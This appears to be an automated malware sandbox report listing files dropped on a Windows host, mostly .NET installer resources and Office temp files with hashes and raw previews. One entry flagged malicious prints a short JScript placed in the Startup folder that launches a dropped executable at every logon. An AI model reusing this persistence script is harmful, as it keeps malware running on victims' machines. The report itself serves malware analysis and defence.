                                                                                                                                                                  Preview:[11/3/2023, 18:52:21] === Logging started: 2023/11/03 18:52:21 ===..[11/3/2023, 18:52:21] Executable: C:\ProgramData\dotNetFx40_Client_setup.exe v4.0.30319.1..[11/3/2023, 18:52:21] --- logging level: standard ---..[11/3/2023, 18:52:22] Successfully bound to the ClusApi.dll..[11/3/2023, 18:52:22] Error 0x800706d9: Failed to open the current cluster..[11/3/2023, 18:52:22] Cluster drive map: ''..[11/3/2023, 18:52:22] Considering drive: 'C:\'.....[11/3/2023, 18:52:22] Considering drive: 'D:\'.....[11/3/2023, 18:52:22] Drive 'D:\' is rejected because of the unknown or unsuitable drive type..[11/3/2023, 18:52:22] Drive 'C:\' has been selected as the largest fixed drive..[11/3/2023, 18:52:22] Directory 'C:\b53dd3b256ba71dad061693a386e\' has been selected for file extraction..[11/3/2023, 18:52:22] Extracting files to: C:\b53dd3b256ba71dad061693a386e\..[11/3/2023, 18:52:23] Extraction took 1.453 seconds..[11/3/2023, 18:52:23] Executing command line: 'C:\b53dd3b256ba71dad061693a386e\\Setup.exe

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\mso109B.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):663
                                                                                                                                                                  Entropy (8bit):5.949125862393289
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                  MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                  SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                  SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                  SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\mso9F4.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):663
                                                                                                                                                                  Entropy (8bit):5.949125862393289
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                  MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                  SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                  SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                  SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~$ockersInfo1.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                  Entropy (8bit):3.8825771631647745
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:oXB5VEi5Ty2oPxs5JMUmov5seLWRyUlYQ/8IQ:oXP6ahix/8n
                                                                                                                                                                  MD5:97EAE05C69543B0DC12A64B705F02949
                                                                                                                                                                  SHA1:87C10FC9E2F2DD64E4C7F0A640BF699C2FC9AFFC
                                                                                                                                                                  SHA-256:E8572B1E50520B452AA652EBEAD298C8294DBE7DF1A1412E18E532AF02D55385
                                                                                                                                                                  SHA-512:499F58E6B227C952042751348F44D3780AD483605FC07A4F389D3D59500319E653518AE2E6438907F3038E421B5B32889433CFCC9B1CE6808CB5D9F55E36BB7D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..........................................................\pard\par..\par..\par..}...A>\v0 . \par..\pard\li175\par..\pard{\pntext\~.........).<.o.}..e....HZo..=.e

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~$ockersInfo2.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                  Entropy (8bit):3.899098628086637
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:oXB5VEi5Ty2oPxs5JMUmov5seLWRyZzX/LALtzqksYO:oXP6ahi6D0LtGksYO
                                                                                                                                                                  MD5:516CBC88A1ABC5B8A3BA2368E3A0A681
                                                                                                                                                                  SHA1:7677D168ADCE54FFB56FCC6618BA5302A65AD70B
                                                                                                                                                                  SHA-256:7103ED9BB4B8B9F5DB8BBF7ACDBA0DE10963D631576686844CC63E22036A5E30
                                                                                                                                                                  SHA-512:FF5F7D1F5B3DCE8D73E6E2973BD4184F77A8D06CF87065AA10709E788571691D00B32FDD45B9FD3C3B1FA10D7CE380AD7F86FB3DC9B4D40D03E7DF3814125FDE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..........................................................\pard\par..\par..\par..}...A>\v0 . \par..\pard\li175\par..\pard{\pntext\~...........|...}..e.....V...=.e

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):30
                                                                                                                                                                  Entropy (8bit):1.0370104374629148
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:3tmZ:k
                                                                                                                                                                  MD5:DDBACC583626C6638B1BEA8D4658B770
                                                                                                                                                                  SHA1:7EDDF80646BD3897F995C64113525E74D442A4C1
                                                                                                                                                                  SHA-256:A7F771CB1A062C607AF615FCC833E1FD880D294D4B44D59E872420081EC5D0C5
                                                                                                                                                                  SHA-512:8E0BE39323A280BDD58635FB81ECE01CB34477BE09C0F40A79B2965FD95EF621C383EA24D1C1F174994180AC1A1C5075178133D733A3A00347D646ECE1748E97
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TYLO5BJXL6BNM9UA74DF.temp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                  Entropy (8bit):0.41381685030363374
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:/l:
                                                                                                                                                                  MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                  SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                  SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                  SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWOLHYEQCYC8IKA1YBIX.temp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                  Entropy (8bit):0.41381685030363374
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:/l:
                                                                                                                                                                  MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                  SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                  SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                  SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\essam@sasa2023.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):136
                                                                                                                                                                  Entropy (8bit):5.077460406372576
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:qbFRiMImoQ/FERMQseY0xAe5aREQMMkL4+HrL+f:qbFYgtMY8t5afM4f
                                                                                                                                                                  MD5:CCAF353287921A93EF76A256CCAABBFA
                                                                                                                                                                  SHA1:30C36C28B79A1B6552FEEB1B2F15E7021371D06A
                                                                                                                                                                  SHA-256:5FDC70BCE93552FF2104BC38565E22D478E1BD29DC1C31C2E5621C459A81F717
                                                                                                                                                                  SHA-512:2190BC7350E582581A552BFCEA2B5C25898EAAB34F342A81F342F3ED180773425D5BDC5E2281BBB76A67940645793295E24ECCAF7DEA2164AC54CAF417CDBD13
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:var nPiCCaK = new ActiveXObject("Shell.Application");..nPiCCaK.ShellExecute("C:\\ProgramData\\essam@sasa2023.exe", "", "", "Open", "1");

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1025\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (627), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):74214
                                                                                                                                                                  Entropy (8bit):4.180711029644354
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w1hDxsSsxGMZzhKtQOsitz0SBijTJ3ejrwddv:PhDxsnxGMdAVBijTJ3eHm
                                                                                                                                                                  MD5:C5BF74C96A711B3F7004CA6BDDECC491
                                                                                                                                                                  SHA1:4C4D42FF69455F267CE98F1DB8F2C5D76A1046DA
                                                                                                                                                                  SHA-256:6B67C8A77C1A637B72736595AFDF77BDB3910AA9FE48D959775806A0683FFA66
                                                                                                                                                                  SHA-512:2F2071BF9966BFFE64C90263F4B9BD5EFCAC4F976C4E42FBDEAA5D6A6DEE51C33F4902CF5E3D0897E1C841E9182E25C86D42E392887BC3CE3D9ED3D780D96AC9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".. . J.*.9.0.1. .*.4.:.J.D. .'.D.%.9./.'./. .A.J. .H.6.9. .'.D.*.H.'.A.B... .D.E.2.J./. .E.F. .'.D.E.9.D.H.E.'.*... .1.'.,.9. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.'.D.E.D.A. .'.D.*.E.G.J./.J.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17240
                                                                                                                                                                  Entropy (8bit):5.619267132242324
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:Ea4ZUfwxW1NX2QxqaSzWUrfncpNWLIeWkQKPnEtObMacxc8hjXHUz1TrOKA+nfW6:Nx2SX2vPzBrSNWkeWkLXci2jXHU46iQ
                                                                                                                                                                  MD5:35B62B395968B7754C298FBB410E9821
                                                                                                                                                                  SHA1:DE95297EE33466DDA2A63C8658E79F17EBBB2911
                                                                                                                                                                  SHA-256:4BC6711145430AC74F0D8F80A41DD89ACE79427EBAF7D3CFE479A43DB08D66E1
                                                                                                                                                                  SHA-512:CD34802098D57CA81446B32D2CD39B3B3FA659ED0A366167C09DAD5FF583B2266E28BA044486E343E4336A40E85D4A713E4E67EAC00B6CBFC3D4C33A1B9BD23B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: dotNetFx40_Full_setup.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........(...............................................P............@.......................................... ...$...........,..X............................................................................................text...G...........................@..@.rsrc....0... ...&..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1025\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1256, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):7567
                                                                                                                                                                  Entropy (8bit):4.307679152385702
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sf3yLpQxL75CD7sH08JUXthIT2M+bOx7BnT7QUm2:AyLpQxL7YsH08JUXQT2M+s7BnT7QUm2
                                                                                                                                                                  MD5:AF1A4F6740A8B51683DFD89D520EB729
                                                                                                                                                                  SHA1:6B02C8E704D2D90DE9E0B63FA389B2899C75E567
                                                                                                                                                                  SHA-256:E4BA6C3852C94BB2034DFFED5A0FE45150E873B98ABA95A2C3A93A71227EF605
                                                                                                                                                                  SHA-512:C669728CA1AF1513DB36EAEE9F15AA7B0209E2F9E85C7FAE759794D05DEEF2920712C9C6F7AAF4ED1B13BF83D310DF6E770CD6C9A49D7FE62FD5F9A11464B255
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1256\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset178 Tahoma;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset178 Times New Roman;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\rtlpar\nowidctlpar\sb120\sa120\qr\lang1025\b\f0\rtlch\fs20\'c7\'e1\'d4\'d1\'e6\'d8 \'c7\'e1\'c5\'d6\'c7\'dd\'ed\'c9 \'e1\'ca\'d1\'ce\'ed\'d5 \'c8\'d1\'e4\'c7\'e3\'cc \lang1033\f1\ltrch MICROSOFT\par..\pard\brdrb\brdrs\brdrw10\brsp20 \rtlpar\nowidctlpar\sb120\sa120\qr MICROSOFT .NET FRAMEWORK 4\lang1025\f0\rtlch \'e1\'e4\'d9\'c7\'e3 \'c7\'e1\'ca\'d4\'db\'ed\'e1 \lang1033\f1\ltrch WINDOWS\lang1025\f0\rtlch \'e3\'e4 \lang1033\f1\ltrch MICROSOFT\par..MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE\lang1025\f0\rtlch \'e1\'e4\'d9\'c7\'e3 \'c7\'e1\'ca\'d4\'db\'ed\'e1 \lang1033\f1\ltrch WINDOWS\lang1025\f0\rtlch \'e3\'e4 \lang1033\f1\ltrch MICROSOFT\f2\par..\lang3073\f

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1028\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60816
                                                                                                                                                                  Entropy (8bit):4.3418522371704045
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
                                                                                                                                                                  MD5:967A6D769D849C5ED66D6F46B0B9C5A4
                                                                                                                                                                  SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
                                                                                                                                                                  SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
                                                                                                                                                                  SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..[..z._!q.l(W.v.['`!j._.N.WL..0.Y..s.0}.......S..&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;....b.jHh&.l.t.;./.A.&.g.t.;..0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..d..[. .M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..S...g.\..g.N.a(u.z._\PbkK.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14168
                                                                                                                                                                  Entropy (8bit):5.9724110685335825
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                                                                                                                                  MD5:7C136B92983CEC25F85336056E45F3E8
                                                                                                                                                                  SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                                                                                                                                  SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                                                                                                                                  SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: dotNetFx40_Full_setup.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                  • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                  • Filename: TinyTakeSetup_v_5_2_16.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@......E.....@.......................................... ..X............ ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1028\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6309
                                                                                                                                                                  Entropy (8bit):4.470827969332999
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
                                                                                                                                                                  MD5:6F2F198B6D2F11C0CBCE4541900BF75C
                                                                                                                                                                  SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
                                                                                                                                                                  SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
                                                                                                                                                                  SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg950\deff0\deflang1033\deflangfe1028{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset136 \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars (<?[`\'7b\'a2\'47\'a2\'44?\'a1\'a5\'a1\'a7}{\*\fchars !'),.:\'3b>?]|\'7d\'a2\'46\'a1\'50?\'a1\'56\'a1\'58\'a1\'a6\'a1\'a8\'a1\'45\'a1\'4b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1028\f1\'b3\'6e\'c5\'e9\'bc\'57\'b8\'c9\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0\fs20 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\f0 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 \lang1028\f1\'a5\'ce\'a4\'e1\'ba\'dd\'b3\'5d\'a9

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1029\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (660), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80970
                                                                                                                                                                  Entropy (8bit):3.7136351704498183
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4w9jRY/svLov/QvQovOLeyndT/jfB7eyNdT9eTiyn15byYOMbqav8qAMrZEXw/Fm:Wt/jPvoZJZ0z
                                                                                                                                                                  MD5:0B6ED582EB557573E959E37EBE2FCA6A
                                                                                                                                                                  SHA1:82C19C7EAFB28593F453341ECA225873FB011D4C
                                                                                                                                                                  SHA-256:8A0DA440261940ED89BAD7CD65BBC941CC56001D9AA94515E346D57B7B0838FC
                                                                                                                                                                  SHA-512:ABA3D19F408BD74F010EC49B31A2658E0884661D2EFDA7D999558C90A4589B500570CC80410BA1C323853CA960E7844845729FFF708E3A52EA25F597FAD90759
                                                                                                                                                                  Malicious:false
